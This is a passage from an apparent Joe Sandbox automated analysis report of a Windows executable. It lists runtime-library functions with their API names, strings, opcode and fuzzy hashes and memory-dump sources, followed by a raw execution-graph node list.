                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8E01260E09706C2EF0C5BB1A81913512A0AF88B45F64603DC80EC63D0FE7FA8854B60
                                                                                                                                                                                                                                                        Function 00007FF6063B1704 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                                        • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                                        • Opcode ID: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
                                                                                                                                                                                                                                                        • Instruction ID: f3b7c59731fa4d1711bd2392e093f3aa75c394090b548a3c6c101f9a4585e236
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3510662B18BC186E7298B35D9513696B92FB81B90F18B231C79CC7BD5CF6ED444C740
                                                                                                                                                                                                                                                        Function 00007FF606389808 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                                                                                                                                                                        • String ID: SIZE
                                                                                                                                                                                                                                                        • API String ID: 449872665-3243624926
                                                                                                                                                                                                                                                        • Opcode ID: 87bb56ca121dbe8459ff7cb6c827e9ac43c466e791526e995e40738a5dfd1e5c
                                                                                                                                                                                                                                                        • Instruction ID: f6b2333ed03b81c01bae223064d5eed0141a95801973a19450465d46af4c6a6a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87bb56ca121dbe8459ff7cb6c827e9ac43c466e791526e995e40738a5dfd1e5c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0641E772A1878299EE18DF18E4413FD6350EF857A0F606231EA9DC26E6EF7ED540C780
                                                                                                                                                                                                                                                        Function 00007FF6063AF7A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        • C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, xrefs: 00007FF6063AF7D9
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                                                        • API String ID: 3307058713-2271546086
                                                                                                                                                                                                                                                        • Opcode ID: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
                                                                                                                                                                                                                                                        • Instruction ID: 8f98e343ea000d10008916581dfab14bd74fee32fbe9d8c7e531866a0be4d6f3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5419432A08A5686EB1DDF22E5400BDB794EF447C4B647039EA4EC7B95DF3EE8419380
                                                                                                                                                                                                                                                        Function 00007FF606389A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide_snwprintf
                                                                                                                                                                                                                                                        • String ID: $%s$@%s
                                                                                                                                                                                                                                                        • API String ID: 2650857296-834177443
                                                                                                                                                                                                                                                        • Opcode ID: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                                                                                                                                                                                                                                        • Instruction ID: cc8dced10d3122e730837849178378fa32fff343bc714f3ad75d3b0bf303658c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5031A572B18B4689EA188F69E4407F963A0FF44784F607032EE0D97BA5DE7EE505C780
                                                                                                                                                                                                                                                        Function 00007FF6063B2014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                        • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                        • Opcode ID: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                                                                                                        • Instruction ID: 15241c248c316b318f96047877dc9a7054da73d873289e933ecd49f424d8d835
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3721A922E08F4381EB688B2595A017A6651EB49774F353335D7AF477D4CE3ED981D380
                                                                                                                                                                                                                                                        Function 00007FF6063A7848 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6063A57EE), ref: 00007FF6063A788C
                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6063A57EE), ref: 00007FF6063A78D2
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                                                                                                        • Instruction ID: d6f4c2346f02747d6b24e97156a5d0a41a3da7b325e8db055070f10f5a19c611
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97115E36A18B8582EB288F15F480269B7B5FB88B88F685230EF8D47758DF3DD551CB40
                                                                                                                                                                                                                                                        Function 00007FF60638A83C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                                                                                                                                                        • String ID: RTL
                                                                                                                                                                                                                                                        • API String ID: 3537982541-834975271
                                                                                                                                                                                                                                                        • Opcode ID: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                                                                                                        • Instruction ID: 71e63b0056ec7337ce8ba6d8a7d566ca771235cbca1515f96e24e2b473a19f08
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9D01791F09B4682FF1D4B62A84837456505B18B41F683038CA1E86390EE6ED0888794

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:9.4%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                        Total number of Limit Nodes:34
                                                                                                                                                                                                                                                        execution_graph 20259 7ff6d926ad69 20262 7ff6d9255478 LeaveCriticalSection 20259->20262 20495 7ff6d926abe3 20496 7ff6d926abf3 20495->20496 20499 7ff6d9255478 LeaveCriticalSection 20496->20499 18870 7ff6d9259961 18871 7ff6d925a3d8 45 API calls 18870->18871 18872 7ff6d9259966 18871->18872 18873 7ff6d925998d GetModuleHandleW 18872->18873 18874 7ff6d92599d7 18872->18874 18873->18874 18875 7ff6d925999a 18873->18875 18882 7ff6d9259864 18874->18882 18875->18874 18896 7ff6d9259a88 GetModuleHandleExW 18875->18896 18902 7ff6d92602d8 EnterCriticalSection 18882->18902 18897 7ff6d9259abc GetProcAddress 18896->18897 18898 7ff6d9259ae5 18896->18898 18899 7ff6d9259ace 18897->18899 18900 7ff6d9259aea FreeLibrary 18898->18900 18901 7ff6d9259af1 18898->18901 18899->18898 18900->18901 18901->18874 19455 7ff6d92608c8 19456 7ff6d92608ec 19455->19456 19459 7ff6d92608fc 19455->19459 19457 7ff6d9254f08 _get_daylight 11 API calls 19456->19457 19477 7ff6d92608f1 19457->19477 19458 7ff6d9260bdc 19461 7ff6d9254f08 _get_daylight 11 API calls 19458->19461 19459->19458 19460 7ff6d926091e 19459->19460 19462 7ff6d926093f 19460->19462 19586 7ff6d9260f84 19460->19586 19463 7ff6d9260be1 19461->19463 19466 7ff6d92609b1 19462->19466 19468 7ff6d9260965 19462->19468 19473 7ff6d92609a5 19462->19473 19465 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19463->19465 19465->19477 19470 7ff6d925eb98 _get_daylight 11 API calls 19466->19470 19484 7ff6d9260974 19466->19484 19467 7ff6d9260a5e 19476 7ff6d9260a7b 19467->19476 19485 7ff6d9260acd 19467->19485 19601 7ff6d92596c0 19468->19601 19474 7ff6d92609c7 19470->19474 19472 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19472->19477 19473->19467 19473->19484 19607 7ff6d926712c 19473->19607 19478 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19474->19478 19481 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19476->19481 19482 7ff6d92609d5 19478->19482 19479 7ff6d926098d 19479->19473 19487 7ff6d9260f84 45 API calls 19479->19487 19480 7ff6d926096f 19483 7ff6d9254f08 _get_daylight 11 API calls 19480->19483 19486 7ff6d9260a84 19481->19486 19482->19473 19482->19484 19489 7ff6d925eb98 _get_daylight 11 API calls 19482->19489 19483->19484 19484->19472 19485->19484 19488 7ff6d92633dc 40 API calls 19485->19488 19496 7ff6d9260a89 19486->19496 19643 7ff6d92633dc 19486->19643 19487->19473 19490 7ff6d9260b0a 19488->19490 19491 7ff6d92609f7 19489->19491 19492 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19490->19492 19494 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19491->19494 19495 7ff6d9260b14 19492->19495 19494->19473 19495->19484 19495->19496 19497 7ff6d9260bd0 19496->19497 19501 7ff6d925eb98 _get_daylight 11 API calls 19496->19501 19499 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19497->19499 19498 7ff6d9260ab5 19500 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19498->19500 19499->19477 19500->19496 19502 7ff6d9260b58 19501->19502 19503 7ff6d9260b69 19502->19503 19504 7ff6d9260b60 19502->19504 19506 7ff6d925a4a4 __std_exception_copy 37 API calls 19503->19506 19505 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19504->19505 19507 7ff6d9260b67 19505->19507 19508 7ff6d9260b78 19506->19508 19513 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19507->19513 19509 7ff6d9260c0b 19508->19509 19510 7ff6d9260b80 19508->19510 19512 7ff6d925a900 _isindst 17 API calls 19509->19512 19652 7ff6d9267244 19510->19652 19515 7ff6d9260c1f 19512->19515 19513->19477 19518 7ff6d9260c48 19515->19518 19525 7ff6d9260c58 19515->19525 19516 7ff6d9260ba7 19521 7ff6d9254f08 _get_daylight 11 API calls 19516->19521 19517 7ff6d9260bc8 19520 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19517->19520 19519 7ff6d9254f08 _get_daylight 11 API calls 19518->19519 19522 7ff6d9260c4d 19519->19522 19520->19497 19523 7ff6d9260bac 19521->19523 19526 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19523->19526 19524 7ff6d9260f3b 19528 7ff6d9254f08 _get_daylight 11 API calls 19524->19528 19525->19524 19527 7ff6d9260c7a 19525->19527 19526->19507 19529 7ff6d9260c97 19527->19529 19671 7ff6d926106c 19527->19671 19530 7ff6d9260f40 19528->19530 19533 7ff6d9260d0b 19529->19533 19534 7ff6d9260cff 19529->19534 19536 7ff6d9260cbf 19529->19536 19532 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19530->19532 19532->19522 19535 7ff6d9260cce 19533->19535 19542 7ff6d925eb98 _get_daylight 11 API calls 19533->19542 19554 7ff6d9260d33 19533->19554 19534->19535 19553 7ff6d9260dbe 19534->19553 19692 7ff6d9266fec 19534->19692 19541 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19535->19541 19686 7ff6d92596fc 19536->19686 19539 7ff6d9260e2e 19539->19535 19557 7ff6d92633dc 40 API calls 19539->19557 19540 7ff6d925eb98 _get_daylight 11 API calls 19547 7ff6d9260d55 19540->19547 19541->19522 19548 7ff6d9260d25 19542->19548 19544 7ff6d9260ce7 19544->19534 19556 7ff6d926106c 45 API calls 19544->19556 19545 7ff6d9260cc9 19550 7ff6d9254f08 _get_daylight 11 API calls 19545->19550 19546 7ff6d9260ddb 19551 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19546->19551 19552 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19547->19552 19549 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19548->19549 19549->19554 19550->19535 19555 7ff6d9260de4 19551->19555 19552->19534 19553->19539 19553->19546 19554->19534 19554->19535 19554->19540 19560 7ff6d92633dc 40 API calls 19555->19560 19562 7ff6d9260dea 19555->19562 19556->19534 19558 7ff6d9260e6c 19557->19558 19559 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19558->19559 19561 7ff6d9260e76 19559->19561 19564 7ff6d9260e16 19560->19564 19561->19535 19561->19562 19563 7ff6d9260f2f 19562->19563 19567 7ff6d925eb98 _get_daylight 11 API calls 19562->19567 19565 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19563->19565 19566 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19564->19566 19565->19522 19566->19562 19568 7ff6d9260ebb 19567->19568 19569 7ff6d9260ecc 19568->19569 19570 7ff6d9260ec3 19568->19570 19572 7ff6d9260474 37 API calls 19569->19572 19571 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19570->19571 19573 7ff6d9260eca 19571->19573 19574 7ff6d9260eda 19572->19574 19580 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19573->19580 19575 7ff6d9260ee2 SetEnvironmentVariableW 19574->19575 19576 7ff6d9260f6f 19574->19576 19577 7ff6d9260f27 19575->19577 19578 7ff6d9260f06 19575->19578 19579 7ff6d925a900 _isindst 17 API calls 19576->19579 19581 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19577->19581 19582 7ff6d9254f08 _get_daylight 11 API calls 19578->19582 19583 7ff6d9260f83 19579->19583 19580->19522 19581->19563 19584 7ff6d9260f0b 19582->19584 19585 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19584->19585 19585->19573 19587 7ff6d9260fb9 19586->19587 19588 7ff6d9260fa1 19586->19588 19589 7ff6d925eb98 _get_daylight 11 API calls 19587->19589 19588->19462 19595 7ff6d9260fdd 19589->19595 19590 7ff6d926103e 19593 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19590->19593 19591 7ff6d925a504 __CxxCallCatchBlock 45 API calls 19592 7ff6d9261068 19591->19592 19593->19588 19594 7ff6d925eb98 _get_daylight 11 API calls 19594->19595 19595->19590 19595->19594 19596 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19595->19596 19597 7ff6d925a4a4 __std_exception_copy 37 API calls 19595->19597 19598 7ff6d926104d 19595->19598 19600 7ff6d9261062 19595->19600 19596->19595 19597->19595 19599 7ff6d925a900 _isindst 17 API calls 19598->19599 19599->19600 19600->19591 19602 7ff6d92596d0 19601->19602 19606 7ff6d92596d9 19601->19606 19602->19606 19716 7ff6d9259198 19602->19716 19606->19479 19606->19480 19608 7ff6d9267139 19607->19608 19609 7ff6d9266254 19607->19609 19611 7ff6d9254f4c 45 API calls 19608->19611 19610 7ff6d9266261 19609->19610 19615 7ff6d9266297 19609->19615 19613 7ff6d9254f08 _get_daylight 11 API calls 19610->19613 19629 7ff6d9266208 19610->19629 19612 7ff6d926716d 19611->19612 19616 7ff6d9267172 19612->19616 19620 7ff6d9267183 19612->19620 19623 7ff6d926719a 19612->19623 19617 7ff6d926626b 19613->19617 19614 7ff6d92662c1 19618 7ff6d9254f08 _get_daylight 11 API calls 19614->19618 19615->19614 19619 7ff6d92662e6 19615->19619 19616->19473 19621 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19617->19621 19622 7ff6d92662c6 19618->19622 19630 7ff6d9254f4c 45 API calls 19619->19630 19635 7ff6d92662d1 19619->19635 19624 7ff6d9254f08 _get_daylight 11 API calls 19620->19624 19625 7ff6d9266276 19621->19625 19626 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19622->19626 19627 7ff6d92671b6 19623->19627 19628 7ff6d92671a4 19623->19628 19631 7ff6d9267188 19624->19631 19625->19473 19626->19635 19633 7ff6d92671c7 19627->19633 19634 7ff6d92671de 19627->19634 19632 7ff6d9254f08 _get_daylight 11 API calls 19628->19632 19629->19473 19630->19635 19636 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19631->19636 19637 7ff6d92671a9 19632->19637 19933 7ff6d92662a4 19633->19933 19942 7ff6d9268f4c 19634->19942 19635->19473 19636->19616 19640 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19637->19640 19640->19616 19642 7ff6d9254f08 _get_daylight 11 API calls 19642->19616 19644 7ff6d926341b 19643->19644 19645 7ff6d92633fe 19643->19645 19646 7ff6d9263425 19644->19646 19982 7ff6d9267c38 19644->19982 19645->19644 19647 7ff6d926340c 19645->19647 19989 7ff6d9267c74 19646->19989 19649 7ff6d9254f08 _get_daylight 11 API calls 19647->19649 19651 7ff6d9263411 __scrt_get_show_window_mode 19649->19651 19651->19498 19653 7ff6d9254f4c 45 API calls 19652->19653 19654 7ff6d92672aa 19653->19654 19656 7ff6d92672b8 19654->19656 20001 7ff6d925ef24 19654->20001 20004 7ff6d92554ac 19656->20004 19659 7ff6d92673a4 19662 7ff6d92673b5 19659->19662 19663 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19659->19663 19660 7ff6d9254f4c 45 API calls 19661 7ff6d9267327 19660->19661 19665 7ff6d925ef24 5 API calls 19661->19665 19668 7ff6d9267330 19661->19668 19664 7ff6d9260ba3 19662->19664 19666 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19662->19666 19663->19662 19664->19516 19664->19517 19665->19668 19666->19664 19667 7ff6d92554ac 14 API calls 19669 7ff6d926738b 19667->19669 19668->19667 19669->19659 19670 7ff6d9267393 SetEnvironmentVariableW 19669->19670 19670->19659 19672 7ff6d92610ac 19671->19672 19673 7ff6d926108f 19671->19673 19674 7ff6d925eb98 _get_daylight 11 API calls 19672->19674 19673->19529 19681 7ff6d92610d0 19674->19681 19675 7ff6d9261154 19676 7ff6d925a504 __CxxCallCatchBlock 45 API calls 19675->19676 19678 7ff6d926115a 19676->19678 19677 7ff6d9261131 19679 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19677->19679 19679->19673 19680 7ff6d925eb98 _get_daylight 11 API calls 19680->19681 19681->19675 19681->19677 19681->19680 19682 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19681->19682 19683 7ff6d9260474 37 API calls 19681->19683 19684 7ff6d9261140 19681->19684 19682->19681 19683->19681 19685 7ff6d925a900 _isindst 17 API calls 19684->19685 19685->19675 19687 7ff6d925970c 19686->19687 19690 7ff6d9259715 19686->19690 19687->19690 20026 7ff6d925920c 19687->20026 19690->19544 19690->19545 19693 7ff6d9266ff9 19692->19693 19697 7ff6d9267026 19692->19697 19694 7ff6d9266ffe 19693->19694 19693->19697 19695 7ff6d9254f08 _get_daylight 11 API calls 19694->19695 19698 7ff6d9267003 19695->19698 19696 7ff6d926706a 19699 7ff6d9254f08 _get_daylight 11 API calls 19696->19699 19697->19696 19700 7ff6d9267089 19697->19700 19714 7ff6d926705e 